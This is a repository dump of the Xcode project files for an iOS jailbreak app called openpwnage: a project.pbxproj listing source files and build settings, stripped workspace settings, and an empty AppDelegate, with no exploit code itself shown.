lastKnownFileType = sourcecode.c.h; path = exploit_utilities.h; sourceTree = ""; }; 39 | B0058156284B22E500B0A55F /* iosurface.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = iosurface.h; sourceTree = ""; }; 40 | B0058157284B22E500B0A55F /* kernel_memory.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = kernel_memory.c; sourceTree = ""; }; 41 | B0058158284B22E500B0A55F /* sp_offsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = sp_offsets.m; sourceTree = ""; }; 42 | B0058159284B22E500B0A55F /* iosurface.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = iosurface.c; sourceTree = ""; }; 43 | B005815A284B22E500B0A55F /* exploit_utilities.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = exploit_utilities.c; sourceTree = ""; }; 44 | B005815B284B22E500B0A55F /* exploit.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = exploit.c; sourceTree = ""; }; 45 | B00EE4E12851269700DA200C /* trident.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = trident.m; sourceTree = ""; }; 46 | B00EE4E92851A55900DA200C /* patchfinder8.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder8.h; sourceTree = ""; }; 47 | B00EE4EA2851A55900DA200C /* patchfinder8.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = patchfinder8.c; sourceTree = ""; }; 48 | B03D34A4284BFB130052E025 /* tar */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = tar; sourceTree = ""; }; 49 | B0463B872815AF4500F6C07E /* jailbreak.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = jailbreak.m; sourceTree = ""; }; 50 | B0463B8C2815BB5C00F6C07E /* jailbreak.h */ = {isa = PBXFileReference; lastKnownFileType = 
sourcecode.c.h; path = jailbreak.h; sourceTree = ""; }; 51 | B05E8BB22810C16E00EA3CE0 /* openpwnage.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = openpwnage.app; sourceTree = BUILT_PRODUCTS_DIR; }; 52 | B05E8BB52810C16E00EA3CE0 /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 53 | B05E8BB62810C16E00EA3CE0 /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 54 | B05E8BBB2810C16E00EA3CE0 /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; 55 | B05E8BBC2810C16E00EA3CE0 /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 56 | B05E8BBF2810C16E00EA3CE0 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 57 | B05E8BC12810C17300EA3CE0 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 58 | B05E8BC42810C17300EA3CE0 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; 59 | B05E8BC72810C17300EA3CE0 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 60 | B05E8BCE2810C8A600EA3CE0 /* Info.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 61 | B06829C4284C124F00C4B92C /* launchctl */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = launchctl; sourceTree = ""; }; 62 | B086939B2812E7A400E9CAAD /* phoenix.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = 
phoenix.m; sourceTree = ""; }; 63 | B0A59D71288C632300943659 /* pf10.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = pf10.h; sourceTree = ""; }; 64 | B0A59D72288C632300943659 /* pf10.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = pf10.c; sourceTree = ""; }; 65 | B0C29471281F01B100B00F98 /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = IOKit/IOKit.framework; sourceTree = ""; }; 66 | B0D2591428601C0C00BAFA4C /* bootstrap.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = bootstrap.tar; sourceTree = ""; }; 67 | B0F470DB2839223A0019CB57 /* patchfinder.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder.h; sourceTree = ""; }; 68 | B0F470DC2839223B0019CB57 /* patchfinder.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = patchfinder.c; sourceTree = ""; }; 69 | B0F470E128407C7E0019CB57 /* SettingsViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = SettingsViewController.m; sourceTree = ""; }; 70 | B0F470E328407C9C0019CB57 /* SettingsViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = SettingsViewController.h; sourceTree = ""; }; 71 | /* End PBXFileReference section */ 72 | 73 | /* Begin PBXFrameworksBuildPhase section */ 74 | B05E8BAF2810C16E00EA3CE0 /* Frameworks */ = { 75 | isa = PBXFrameworksBuildPhase; 76 | buildActionMask = 2147483647; 77 | files = ( 78 | B0C29472281F01B100B00F98 /* IOKit.framework in Frameworks */, 79 | ); 80 | runOnlyForDeploymentPostprocessing = 0; 81 | }; 82 | /* End PBXFrameworksBuildPhase section */ 83 | 84 | /* Begin PBXGroup section */ 85 | B0058151284B22E500B0A55F /* sock_port */ = { 86 | isa = PBXGroup; 87 | children = ( 88 | B0058152284B22E500B0A55F /* kernel_memory.h */, 89 | B0058153284B22E500B0A55F /* sp_offsets.h */, 90 | B0058154284B22E500B0A55F /* 
exploit.h */, 91 | B0058155284B22E500B0A55F /* exploit_utilities.h */, 92 | B0058156284B22E500B0A55F /* iosurface.h */, 93 | B0058157284B22E500B0A55F /* kernel_memory.c */, 94 | B0058158284B22E500B0A55F /* sp_offsets.m */, 95 | B0058159284B22E500B0A55F /* iosurface.c */, 96 | B005815A284B22E500B0A55F /* exploit_utilities.c */, 97 | B005815B284B22E500B0A55F /* exploit.c */, 98 | B0A59D71288C632300943659 /* pf10.h */, 99 | B0A59D72288C632300943659 /* pf10.c */, 100 | ); 101 | path = sock_port; 102 | sourceTree = ""; 103 | }; 104 | B05E8BA92810C16D00EA3CE0 = { 105 | isa = PBXGroup; 106 | children = ( 107 | B05E8BB42810C16E00EA3CE0 /* openpwnage */, 108 | B05E8BB32810C16E00EA3CE0 /* Products */, 109 | B0E990482811C40E00A9FFC4 /* Frameworks */, 110 | ); 111 | sourceTree = ""; 112 | }; 113 | B05E8BB32810C16E00EA3CE0 /* Products */ = { 114 | isa = PBXGroup; 115 | children = ( 116 | B05E8BB22810C16E00EA3CE0 /* openpwnage.app */, 117 | ); 118 | name = Products; 119 | sourceTree = ""; 120 | }; 121 | B05E8BB42810C16E00EA3CE0 /* openpwnage */ = { 122 | isa = PBXGroup; 123 | children = ( 124 | B06829C4284C124F00C4B92C /* launchctl */, 125 | B03D34A4284BFB130052E025 /* tar */, 126 | B0D2591428601C0C00BAFA4C /* bootstrap.tar */, 127 | B0058151284B22E500B0A55F /* sock_port */, 128 | B0F470DB2839223A0019CB57 /* patchfinder.h */, 129 | B0F470DC2839223B0019CB57 /* patchfinder.c */, 130 | B05E8BB52810C16E00EA3CE0 /* AppDelegate.h */, 131 | B05E8BB62810C16E00EA3CE0 /* AppDelegate.m */, 132 | B05E8BBB2810C16E00EA3CE0 /* ViewController.h */, 133 | B05E8BBC2810C16E00EA3CE0 /* ViewController.m */, 134 | B05E8BBE2810C16E00EA3CE0 /* Main.storyboard */, 135 | B05E8BC12810C17300EA3CE0 /* Assets.xcassets */, 136 | B05E8BC32810C17300EA3CE0 /* LaunchScreen.storyboard */, 137 | B05E8BCE2810C8A600EA3CE0 /* Info.plist */, 138 | B05E8BC72810C17300EA3CE0 /* main.m */, 139 | B086939B2812E7A400E9CAAD /* phoenix.m */, 140 | B0463B872815AF4500F6C07E /* jailbreak.m */, 141 | B0463B8C2815BB5C00F6C07E /* 
jailbreak.h */, 142 | B0F470E128407C7E0019CB57 /* SettingsViewController.m */, 143 | B0F470E328407C9C0019CB57 /* SettingsViewController.h */, 144 | B00EE4E12851269700DA200C /* trident.m */, 145 | B00EE4E92851A55900DA200C /* patchfinder8.h */, 146 | B00EE4EA2851A55900DA200C /* patchfinder8.c */, 147 | ); 148 | path = openpwnage; 149 | sourceTree = ""; 150 | }; 151 | B0E990482811C40E00A9FFC4 /* Frameworks */ = { 152 | isa = PBXGroup; 153 | children = ( 154 | B0C29471281F01B100B00F98 /* IOKit.framework */, 155 | ); 156 | name = Frameworks; 157 | sourceTree = ""; 158 | }; 159 | /* End PBXGroup section */ 160 | 161 | /* Begin PBXNativeTarget section */ 162 | B05E8BB12810C16E00EA3CE0 /* openpwnage */ = { 163 | isa = PBXNativeTarget; 164 | buildConfigurationList = B05E8BCB2810C17300EA3CE0 /* Build configuration list for PBXNativeTarget "openpwnage" */; 165 | buildPhases = ( 166 | B05E8BAE2810C16E00EA3CE0 /* Sources */, 167 | B05E8BAF2810C16E00EA3CE0 /* Frameworks */, 168 | B05E8BB02810C16E00EA3CE0 /* Resources */, 169 | ); 170 | buildRules = ( 171 | ); 172 | dependencies = ( 173 | ); 174 | name = openpwnage; 175 | productName = openpwnage; 176 | productReference = B05E8BB22810C16E00EA3CE0 /* openpwnage.app */; 177 | productType = "com.apple.product-type.application"; 178 | }; 179 | /* End PBXNativeTarget section */ 180 | 181 | /* Begin PBXProject section */ 182 | B05E8BAA2810C16D00EA3CE0 /* Project object */ = { 183 | isa = PBXProject; 184 | attributes = { 185 | BuildIndependentTargetsInParallel = 1; 186 | LastUpgradeCheck = 1310; 187 | TargetAttributes = { 188 | B05E8BB12810C16E00EA3CE0 = { 189 | CreatedOnToolsVersion = 13.1; 190 | }; 191 | }; 192 | }; 193 | buildConfigurationList = B05E8BAD2810C16D00EA3CE0 /* Build configuration list for PBXProject "openpwnage" */; 194 | compatibilityVersion = "Xcode 13.0"; 195 | developmentRegion = en; 196 | hasScannedForEncodings = 0; 197 | knownRegions = ( 198 | en, 199 | Base, 200 | ); 201 | mainGroup = B05E8BA92810C16D00EA3CE0; 202 
| productRefGroup = B05E8BB32810C16E00EA3CE0 /* Products */; 203 | projectDirPath = ""; 204 | projectRoot = ""; 205 | targets = ( 206 | B05E8BB12810C16E00EA3CE0 /* openpwnage */, 207 | ); 208 | }; 209 | /* End PBXProject section */ 210 | 211 | /* Begin PBXResourcesBuildPhase section */ 212 | B05E8BB02810C16E00EA3CE0 /* Resources */ = { 213 | isa = PBXResourcesBuildPhase; 214 | buildActionMask = 2147483647; 215 | files = ( 216 | B05E8BC52810C17300EA3CE0 /* LaunchScreen.storyboard in Resources */, 217 | B05E8BC22810C17300EA3CE0 /* Assets.xcassets in Resources */, 218 | B05E8BC02810C16E00EA3CE0 /* Main.storyboard in Resources */, 219 | B03D34A5284BFB130052E025 /* tar in Resources */, 220 | B0D2591528601C0C00BAFA4C /* bootstrap.tar in Resources */, 221 | B06829C5284C124F00C4B92C /* launchctl in Resources */, 222 | ); 223 | runOnlyForDeploymentPostprocessing = 0; 224 | }; 225 | /* End PBXResourcesBuildPhase section */ 226 | 227 | /* Begin PBXSourcesBuildPhase section */ 228 | B05E8BAE2810C16E00EA3CE0 /* Sources */ = { 229 | isa = PBXSourcesBuildPhase; 230 | buildActionMask = 2147483647; 231 | files = ( 232 | B0A59D73288C632300943659 /* pf10.c in Sources */, 233 | B0F470DD2839223B0019CB57 /* patchfinder.c in Sources */, 234 | B005815C284B22E500B0A55F /* kernel_memory.c in Sources */, 235 | B05E8BBD2810C16E00EA3CE0 /* ViewController.m in Sources */, 236 | B086939C2812E7A400E9CAAD /* phoenix.m in Sources */, 237 | B005815D284B22E500B0A55F /* sp_offsets.m in Sources */, 238 | B05E8BB72810C16E00EA3CE0 /* AppDelegate.m in Sources */, 239 | B0463B882815AF4600F6C07E /* jailbreak.m in Sources */, 240 | B0058160284B22E500B0A55F /* exploit.c in Sources */, 241 | B00EE4E22851269700DA200C /* trident.m in Sources */, 242 | B05E8BC82810C17300EA3CE0 /* main.m in Sources */, 243 | B005815F284B22E500B0A55F /* exploit_utilities.c in Sources */, 244 | B0F470E228407C7E0019CB57 /* SettingsViewController.m in Sources */, 245 | B005815E284B22E500B0A55F /* iosurface.c in Sources */, 246 | 
B00EE4EB2851A55900DA200C /* patchfinder8.c in Sources */, 247 | ); 248 | runOnlyForDeploymentPostprocessing = 0; 249 | }; 250 | /* End PBXSourcesBuildPhase section */ 251 | 252 | /* Begin PBXVariantGroup section */ 253 | B05E8BBE2810C16E00EA3CE0 /* Main.storyboard */ = { 254 | isa = PBXVariantGroup; 255 | children = ( 256 | B05E8BBF2810C16E00EA3CE0 /* Base */, 257 | ); 258 | name = Main.storyboard; 259 | sourceTree = ""; 260 | }; 261 | B05E8BC32810C17300EA3CE0 /* LaunchScreen.storyboard */ = { 262 | isa = PBXVariantGroup; 263 | children = ( 264 | B05E8BC42810C17300EA3CE0 /* Base */, 265 | ); 266 | name = LaunchScreen.storyboard; 267 | sourceTree = ""; 268 | }; 269 | /* End PBXVariantGroup section */ 270 | 271 | /* Begin XCBuildConfiguration section */ 272 | B05E8BC92810C17300EA3CE0 /* Debug */ = { 273 | isa = XCBuildConfiguration; 274 | buildSettings = { 275 | ALWAYS_SEARCH_USER_PATHS = NO; 276 | ARCHS = armv7; 277 | CLANG_ANALYZER_NONNULL = YES; 278 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 279 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++17"; 280 | CLANG_CXX_LIBRARY = "libc++"; 281 | CLANG_ENABLE_MODULES = YES; 282 | CLANG_ENABLE_OBJC_ARC = YES; 283 | CLANG_ENABLE_OBJC_WEAK = YES; 284 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 285 | CLANG_WARN_BOOL_CONVERSION = YES; 286 | CLANG_WARN_COMMA = YES; 287 | CLANG_WARN_CONSTANT_CONVERSION = YES; 288 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 289 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 290 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 291 | CLANG_WARN_EMPTY_BODY = YES; 292 | CLANG_WARN_ENUM_CONVERSION = YES; 293 | CLANG_WARN_INFINITE_RECURSION = YES; 294 | CLANG_WARN_INT_CONVERSION = YES; 295 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 296 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 297 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 298 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 299 | CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; 300 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 301 | 
CLANG_WARN_STRICT_PROTOTYPES = YES; 302 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 303 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 304 | CLANG_WARN_UNREACHABLE_CODE = YES; 305 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 306 | COPY_PHASE_STRIP = NO; 307 | DEBUG_INFORMATION_FORMAT = dwarf; 308 | ENABLE_STRICT_OBJC_MSGSEND = YES; 309 | ENABLE_TESTABILITY = YES; 310 | GCC_C_LANGUAGE_STANDARD = gnu11; 311 | GCC_DYNAMIC_NO_PIC = NO; 312 | GCC_NO_COMMON_BLOCKS = YES; 313 | GCC_OPTIMIZATION_LEVEL = 0; 314 | GCC_PREPROCESSOR_DEFINITIONS = ( 315 | "DEBUG=1", 316 | "$(inherited)", 317 | ); 318 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 319 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 320 | GCC_WARN_UNDECLARED_SELECTOR = YES; 321 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 322 | GCC_WARN_UNUSED_FUNCTION = YES; 323 | GCC_WARN_UNUSED_VARIABLE = YES; 324 | IPHONEOS_DEPLOYMENT_TARGET = 7.0; 325 | MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE; 326 | MTL_FAST_MATH = YES; 327 | ONLY_ACTIVE_ARCH = YES; 328 | SDKROOT = iphoneos; 329 | }; 330 | name = Debug; 331 | }; 332 | B05E8BCA2810C17300EA3CE0 /* Release */ = { 333 | isa = XCBuildConfiguration; 334 | buildSettings = { 335 | ALWAYS_SEARCH_USER_PATHS = NO; 336 | ARCHS = armv7; 337 | CLANG_ANALYZER_NONNULL = YES; 338 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 339 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++17"; 340 | CLANG_CXX_LIBRARY = "libc++"; 341 | CLANG_ENABLE_MODULES = YES; 342 | CLANG_ENABLE_OBJC_ARC = YES; 343 | CLANG_ENABLE_OBJC_WEAK = YES; 344 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 345 | CLANG_WARN_BOOL_CONVERSION = YES; 346 | CLANG_WARN_COMMA = YES; 347 | CLANG_WARN_CONSTANT_CONVERSION = YES; 348 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 349 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 350 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 351 | CLANG_WARN_EMPTY_BODY = YES; 352 | CLANG_WARN_ENUM_CONVERSION = YES; 353 | CLANG_WARN_INFINITE_RECURSION = YES; 354 | CLANG_WARN_INT_CONVERSION = YES; 355 | 
CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 356 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 357 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 358 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 359 | CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; 360 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 361 | CLANG_WARN_STRICT_PROTOTYPES = YES; 362 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 363 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 364 | CLANG_WARN_UNREACHABLE_CODE = YES; 365 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 366 | COPY_PHASE_STRIP = NO; 367 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 368 | ENABLE_NS_ASSERTIONS = NO; 369 | ENABLE_STRICT_OBJC_MSGSEND = YES; 370 | GCC_C_LANGUAGE_STANDARD = gnu11; 371 | GCC_NO_COMMON_BLOCKS = YES; 372 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 373 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 374 | GCC_WARN_UNDECLARED_SELECTOR = YES; 375 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 376 | GCC_WARN_UNUSED_FUNCTION = YES; 377 | GCC_WARN_UNUSED_VARIABLE = YES; 378 | IPHONEOS_DEPLOYMENT_TARGET = 7.0; 379 | MTL_ENABLE_DEBUG_INFO = NO; 380 | MTL_FAST_MATH = YES; 381 | SDKROOT = iphoneos; 382 | VALIDATE_PRODUCT = YES; 383 | }; 384 | name = Release; 385 | }; 386 | B05E8BCC2810C17300EA3CE0 /* Debug */ = { 387 | isa = XCBuildConfiguration; 388 | buildSettings = { 389 | ARCHS = armv7; 390 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 391 | ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; 392 | CODE_SIGN_STYLE = Automatic; 393 | CURRENT_PROJECT_VERSION = 10; 394 | DEVELOPMENT_TEAM = RR5WP5NG77; 395 | FRAMEWORK_SEARCH_PATHS = ( 396 | "$(inherited)", 397 | "$(PROJECT_DIR)/IOKit", 398 | ); 399 | GENERATE_INFOPLIST_FILE = YES; 400 | INFOPLIST_FILE = openpwnage/Info.plist; 401 | INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents = YES; 402 | INFOPLIST_KEY_UILaunchStoryboardName = LaunchScreen; 403 | INFOPLIST_KEY_UIMainStoryboardFile = Main; 404 | INFOPLIST_KEY_UIRequiredDeviceCapabilities = armv7; 405 | 
INFOPLIST_KEY_UIRequiresFullScreen = YES; 406 | INFOPLIST_KEY_UISupportedInterfaceOrientations = UIInterfaceOrientationPortrait; 407 | INFOPLIST_KEY_UISupportedInterfaceOrientations_iPad = "UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown"; 408 | INFOPLIST_KEY_UISupportedInterfaceOrientations_iPhone = "UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight"; 409 | IPHONEOS_DEPLOYMENT_TARGET = 7.0; 410 | LD_RUNPATH_SEARCH_PATHS = ( 411 | "$(inherited)", 412 | "@executable_path/Frameworks", 413 | ); 414 | MARKETING_VERSION = 1.0; 415 | ONLY_ACTIVE_ARCH = NO; 416 | PRODUCT_BUNDLE_IDENTIFIER = com.zachary7829.openpwnage; 417 | PRODUCT_NAME = "$(TARGET_NAME)"; 418 | SWIFT_EMIT_LOC_STRINGS = YES; 419 | TARGETED_DEVICE_FAMILY = "1,2"; 420 | }; 421 | name = Debug; 422 | }; 423 | B05E8BCD2810C17300EA3CE0 /* Release */ = { 424 | isa = XCBuildConfiguration; 425 | buildSettings = { 426 | ARCHS = armv7; 427 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 428 | ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; 429 | CODE_SIGN_STYLE = Automatic; 430 | CURRENT_PROJECT_VERSION = 10; 431 | DEVELOPMENT_TEAM = RR5WP5NG77; 432 | FRAMEWORK_SEARCH_PATHS = ( 433 | "$(inherited)", 434 | "$(PROJECT_DIR)/IOKit", 435 | ); 436 | GENERATE_INFOPLIST_FILE = YES; 437 | INFOPLIST_FILE = openpwnage/Info.plist; 438 | INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents = YES; 439 | INFOPLIST_KEY_UILaunchStoryboardName = LaunchScreen; 440 | INFOPLIST_KEY_UIMainStoryboardFile = Main; 441 | INFOPLIST_KEY_UIRequiredDeviceCapabilities = armv7; 442 | INFOPLIST_KEY_UIRequiresFullScreen = YES; 443 | INFOPLIST_KEY_UISupportedInterfaceOrientations = UIInterfaceOrientationPortrait; 444 | INFOPLIST_KEY_UISupportedInterfaceOrientations_iPad = "UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown"; 445 | INFOPLIST_KEY_UISupportedInterfaceOrientations_iPhone = "UIInterfaceOrientationPortrait 
UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight"; 446 | IPHONEOS_DEPLOYMENT_TARGET = 7.0; 447 | LD_RUNPATH_SEARCH_PATHS = ( 448 | "$(inherited)", 449 | "@executable_path/Frameworks", 450 | ); 451 | MARKETING_VERSION = 1.0; 452 | PRODUCT_BUNDLE_IDENTIFIER = com.zachary7829.openpwnage; 453 | PRODUCT_NAME = "$(TARGET_NAME)"; 454 | SWIFT_EMIT_LOC_STRINGS = YES; 455 | TARGETED_DEVICE_FAMILY = "1,2"; 456 | }; 457 | name = Release; 458 | }; 459 | /* End XCBuildConfiguration section */ 460 | 461 | /* Begin XCConfigurationList section */ 462 | B05E8BAD2810C16D00EA3CE0 /* Build configuration list for PBXProject "openpwnage" */ = { 463 | isa = XCConfigurationList; 464 | buildConfigurations = ( 465 | B05E8BC92810C17300EA3CE0 /* Debug */, 466 | B05E8BCA2810C17300EA3CE0 /* Release */, 467 | ); 468 | defaultConfigurationIsVisible = 0; 469 | defaultConfigurationName = Release; 470 | }; 471 | B05E8BCB2810C17300EA3CE0 /* Build configuration list for PBXNativeTarget "openpwnage" */ = { 472 | isa = XCConfigurationList; 473 | buildConfigurations = ( 474 | B05E8BCC2810C17300EA3CE0 /* Debug */, 475 | B05E8BCD2810C17300EA3CE0 /* Release */, 476 | ); 477 | defaultConfigurationIsVisible = 0; 478 | defaultConfigurationName = Release; 479 | }; 480 | /* End XCConfigurationList section */ 481 | }; 482 | rootObject = B05E8BAA2810C16D00EA3CE0 /* Project object */; 483 | } 484 | -------------------------------------------------------------------------------- /openpwnage.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /openpwnage.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | 
-------------------------------------------------------------------------------- /openpwnage.xcodeproj/project.xcworkspace/xcshareddata/WorkspaceSettings.xcsettings: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | DisableBuildSystemDeprecationDiagnostic 6 | 7 | PreviewsEnabled 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /openpwnage.xcodeproj/project.xcworkspace/xcuserdata/zachary7829.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage.xcodeproj/project.xcworkspace/xcuserdata/zachary7829.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /openpwnage.xcodeproj/project.xcworkspace/xcuserdata/zachary7829.xcuserdatad/WorkspaceSettings.xcsettings: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | BuildLocationStyle 6 | UseAppPreferences 7 | CustomBuildLocationType 8 | RelativeToDerivedData 9 | DerivedDataLocationStyle 10 | Default 11 | IssueFilterStyle 12 | ShowActiveSchemeOnly 13 | LiveSourceIssuesEnabled 14 | 15 | ShowSharedSchemesAutomaticallyEnabled 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /openpwnage.xcodeproj/xcshareddata/xcschemes/openpwnage.xcscheme: -------------------------------------------------------------------------------- 1 | 2 | 5 | 8 | 9 | 15 | 21 | 22 | 23 | 24 | 25 | 30 | 31 | 32 | 33 | 43 | 45 | 51 | 52 | 53 | 54 | 60 | 62 | 68 | 69 | 70 | 71 | 73 | 74 | 77 | 78 | 79 | -------------------------------------------------------------------------------- /openpwnage.xcodeproj/xcuserdata/zachary7829.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist: 
-------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 9 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /openpwnage.xcodeproj/xcuserdata/zachary7829.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | openpwnage.xcscheme_^#shared#^_ 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | SuppressBuildableAutocreation 14 | 15 | B05E8BB12810C16E00EA3CE0 16 | 17 | primary 18 | 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /openpwnage/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // openpwnage 4 | // 5 | // Created by Zachary Keffaber on 4/20/22. 6 | // 7 | 8 | #import 9 | 10 | @interface AppDelegate : UIResponder 11 | 12 | @property (strong, nonatomic) UIWindow *window; 13 | @end 14 | 15 | -------------------------------------------------------------------------------- /openpwnage/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // openpwnage 4 | // 5 | // Created by Zachary Keffaber on 4/20/22. 
6 | // 7 | 8 | #import "AppDelegate.h" 9 | 10 | // #import "AppDelegate.h" 11 | 12 | @interface AppDelegate () 13 | 14 | @end 15 | 16 | /* Application delegate with no startup or teardown work of its own: every UIApplicationDelegate hook below is a no-op, so the delegate only exists to satisfy the framework. */ @implementation AppDelegate 17 | 18 | 19 | /* Launch hook. Performs no setup and returns YES unconditionally, so the app always finishes launching. */ - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 20 | return YES; 21 | } 22 | 23 | 24 | /* Intentionally empty: nothing is paused when the app loses foreground focus. */ - (void)applicationWillResignActive:(UIApplication *)application { 25 | return; 26 | } 27 | 28 | 29 | /* Intentionally empty: no state is saved on entering the background. */ - (void)applicationDidEnterBackground:(UIApplication *)application { 30 | return; 31 | } 32 | 33 | 34 | /* Intentionally empty: nothing is restored on returning to the foreground. */ - (void)applicationWillEnterForeground:(UIApplication *)application { 35 | return; 36 | } 37 | 38 | 39 | /* Intentionally empty: nothing is resumed 